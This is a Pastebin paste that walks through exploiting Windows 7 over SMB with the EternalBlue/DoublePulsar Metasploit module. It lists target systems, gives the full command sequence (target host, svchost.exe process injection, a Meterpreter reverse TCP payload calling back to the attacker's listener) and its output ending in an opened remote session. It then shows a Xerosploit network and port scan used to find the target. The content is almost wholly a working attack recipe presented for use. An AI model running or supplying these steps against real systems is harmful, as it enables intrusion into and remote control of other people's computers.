API tools faq
paste
Advertisement
CyberSecurityNEPAL

Exploit windows 7 with IP Eternalblue

CyberSecurityNEPAL
Aug 19th, 2018
500
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.88 KB | None | 0 0
raw download clone embed print report
  1. dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
  2. ' dB' BBP
  3. dB'dB'dB' dBBP dBP dBP BB
  4. dB'dB'dB' dBP dBP dBP BB
  5. dB'dB'dB' dBBBBP dBP dBBBBBBB
  6.  
  7. dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
  8. . . dB' dBP dB'.BP
  9. | dBP dBBBB' dBP dB'.BP dBP dBP
  10. --o-- dBP dBP dBP dB'.BP dBP dBP
  11. | dBBBBP dBP dBBBBP dBBBBP dBP dBP
  12.  
  13. .
  14. .
  15. o To boldly go where no
  16. shell has gone before
  17. ---------------------------------------------------------------------------------------------------------------------------------------
  18. Exploit vulnerability windows 7 ONLY BY IP using Kali Linux Command eternalblue_doublepulsar (CVE) This module exploits a vulnerability on SMBv1/SMBv2 Protocols through Eternablue.
  19.  
  20. Available targets:
  21. Windows XP (all services pack) (x86) (x64)
  22. 1 Windows Server 2003 SP0 (x86)
  23. 2 Windows Server 2003 SP1/SP2 (x86)
  24. 3 Windows Server 2003 (x64)
  25. 4 Windows Vista (x86)
  26. 5 Windows Vista (x64)
  27. 6 Windows Server 2008 (x86)
  28. 7 Windows Server 2008 R2 (x86) (x64)
  29. 8 Windows 7 (all services pack) (x86) (x64)
  30. ---------------------------------------------------------------------------------------------------------------------------------------
  31. msf > use exploit/windows/smb/eternalblue_doublepulsar
  32. msf exploit(eternalblue_doublepulsar) > set rhost 192.168.159.143
  33. rhost => 192.168.159.143
  34. msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT svchost.exe
  35. PROCESSINJECT => svchost.exe
  36. msf exploit(eternalblue_doublepulsar) > set payload windows/meterpreter/reverse_tcp
  37. payload => windows/meterpreter/reverse_tcp
  38. msf exploit(eternalblue_doublepulsar) > set lhost 192.168.159.147
  39. lhost => 192.168.159.147
  40. msf exploit(eternalblue_doublepulsar) > exploit
  41.  
  42. [*] Started reverse TCP handler on 192.168.159.147:4444
  43. [*] 192.168.159.143:445 - Generating Eternalblue XML data
  44. [*] 192.168.159.143:445 - Generating Doublepulsar XML data
  45. [*] 192.168.159.143:445 - Generating payload DLL for Doublepulsar
  46. [*] 192.168.159.143:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
  47. [*] 192.168.159.143:445 - Launching Eternalblue...
  48. [+] 192.168.159.143:445 - Pwned! Eternalblue success!
  49. [*] 192.168.159.143:445 - Launching Doublepulsar...
  50. [*] Sending stage (957487 bytes) to 192.168.159.143
  51. [*] Meterpreter session 1 opened (192.168.159.147:4444 -> 192.168.159.143:49167) at 2018-08-18 21:19:11 +0545
  52. [+] 192.168.159.143:445 - Remote code executed... 3... 2... 1...
  53.  
  54. meterpreter > sysinfo
  55. Computer : WIN-BBCUU0HS2S3
  56. OS : Windows 7 (Build 7600).
  57. Architecture : x86
  58. System Language : en_US
  59. Domain : WORKGROUP
  60. Logged On Users : 2
  61. Meterpreter : x86/windows
  62. meterpreter > \rmeterpreter > \rmeterpreter >
  63. ---------------------------------------------------------------------------------------------------------------------------------------
  64. When you Attack windows 7 first scanning our network Xerosploit command kali linux check port (MICROSOFT-DS) 445 port example down-below
  65. ---------------------------------------------------------------------------------------------------------------------------------------
  66. root@kali:~# xerosploit
  67.  
  68.  
  69. ▒██ ██▒▓█████ ██▀███ ▒█████ ██████ ██▓███ ██▓ ▒█████ ██▓▄▄▄█████▓
  70. ▒▒ █ █ ▒░▓█ ▀ ▓██ ▒ ██▒▒██▒ ██▒▒██ ▒ ▓██░ ██▒▓██▒ ▒██▒ ██▒▓██▒▓ ██▒ ▓▒
  71. ░░ █ ░▒███ ▓██ ░▄█ ▒▒██░ ██▒░ ▓██▄ ▓██░ ██▓▒▒██░ ▒██░ ██▒▒██▒▒ ▓██░ ▒░
  72. ░ █ █ ▒ ▒▓█ ▄ ▒██▀▀█▄ ▒██ ██░ ▒ ██▒▒██▄█▓▒ ▒▒██░ ▒██ ██░░██░░ ▓██▓ ░
  73. ▒██▒ ▒██▒░▒████▒░██▓ ▒██▒░ ████▓▒░▒██████▒▒▒██▒ ░ ░░██████▒░ ████▓▒░░██░ ▒██▒ ░
  74. ▒▒ ░ ░▓ ░░░ ▒░ ░░ ▒▓ ░▒▓░░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░░ ▒░▓ ░░ ▒░▒░▒░ ░▓ ▒ ░░
  75. ░░ ░▒ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ▒░ ░ ░▒ ░ ░░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ▒ ░ ░
  76. ░ ░ ░ ░░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ▒ ▒ ░ ░
  77. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
  78.  
  79.  
  80. [+]═══════════[ Author : @LionSec1 _-\|/-_ Website: lionsec.net ]═══════════[+]
  81.  
  82. [ Powered by Bettercap and Nmap ]
  83.  
  84. ┌═════════════════════════════════════════════════════════════════════════════┐
  85. █ █
  86. █ Your Network Configuration █
  87. █ █
  88. └═════════════════════════════════════════════════════════════════════════════┘
  89.  
  90. ╒═════════════════╤═══════════════╤═══════════════╤═════════╤════════════╕
  91. │ IP Address │ MAC Address │ Gateway │ Iface │ Hostname │
  92. ╞═════════════════╪═══════════════╪═══════════════╪═════════╪════════════╡
  93. ├─────────────────┼───────────────┼───────────────┼─────────┼────────────┤
  94. │ 192.168.159.147 │ │ 192.168.159.2 │ eth0 │ kali │
  95. ╘═════════════════╧═══════════════╧═══════════════╧═════════╧════════════╛
  96.  
  97. ╔═════════════╦════════════════════════════════════════════════════════════════════╗
  98. ║ ║ XeroSploit is a penetration testing toolkit whose goal is to ║
  99. ║ Information ║ perform man in the middle attacks for testing purposes. ║
  100. ║ ║ It brings various modules that allow to realise efficient attacks. ║
  101. ║ ║ This tool is Powered by Bettercap and Nmap. ║
  102. ╚═════════════╩════════════════════════════════════════════════════════════════════╝
  103.  
  104. [+] Please type 'help' to view commands.
  105.  
  106. Xero ➮ scan
  107.  
  108. [++] Mapping your network ...
  109.  
  110. [+]═══════════[ Devices found on your network ]═══════════[+]
  111.  
  112. ╔═════════════════╦═══════════════════╦═══════════════╗
  113. ║ IP Address ║ Mac Address ║ Manufacturer ║
  114. ╠═════════════════╬═══════════════════╬═══════════════╣
  115. ║ 192.168.159.1 ║ 00:50:56:C0:00:08 ║ (VMware) ║
  116. ║ 192.168.159.2 ║ 00:50:56:E3:BD:88 ║ (VMware) ║
  117. ║ 192.168.159.143 ║ 00:0C:29:C2:FC:32 ║ (VMware) ║
  118. ║ 192.168.159.254 ║ 00:50:56:E9:C0:DD ║ (VMware) ║
  119. ║ 192.168.159.147 ║ ║ (This device) ║
  120. ║ ║ ║ ║
  121. ╚═════════════════╩═══════════════════╩═══════════════╝
  122.  
  123. [+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.
  124.  
  125. Xero ➮ 192.168.159.143
  126.  
  127. [++] 192.168.159.143 has been targeted.
  128.  
  129. [+] Which module do you want to load ? Enter 'help' for more information.
  130.  
  131. Xero»modules ➮ pscan
  132.  
  133. ┌══════════════════════════════════════════════════════════════┐
  134. █ █
  135. █ Port Scanner █
  136. █ █
  137. █ Find open ports on network computers and retrieve █
  138. █ versions of programs running on the detected ports █
  139. └══════════════════════════════════════════════════════════════┘
  140.  
  141. [+] Enter 'run' to execute the 'pscan' command.
  142.  
  143. Xero»modules»pscan ➮ run
  144.  
  145. [++] Please wait ... Scanning ports on 192.168.159.143
  146.  
  147. [+]═════════[ Port scan result for 192.168.159.143 ]═════════[+]
  148.  
  149. ╔═══════════════╦══════════╦═══════╗
  150. ║ SERVICE ║ PORT ║ STATE ║
  151. ╠═══════════════╬══════════╬═══════╣
  152. ║ MSRPC ║ 135/TCP ║ OPEN ║
  153. ║ NETBIOS-SSN ║ 139/TCP ║ OPEN ║
  154. ║ MICROSOFT-DS ║ 445/TCP ║ OPEN ║
  155. ║ MS-WBT-SERVER ║ 3389/TCP ║ OPEN ║
  156. ║ ║ ║ ║
  157. ╚═══════════════╩══════════╩═══════╝
  158.  
  159. [+] Enter 'run' to execute the 'pscan' command.
  160.  
  161. Xero»modules»pscan ➮
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!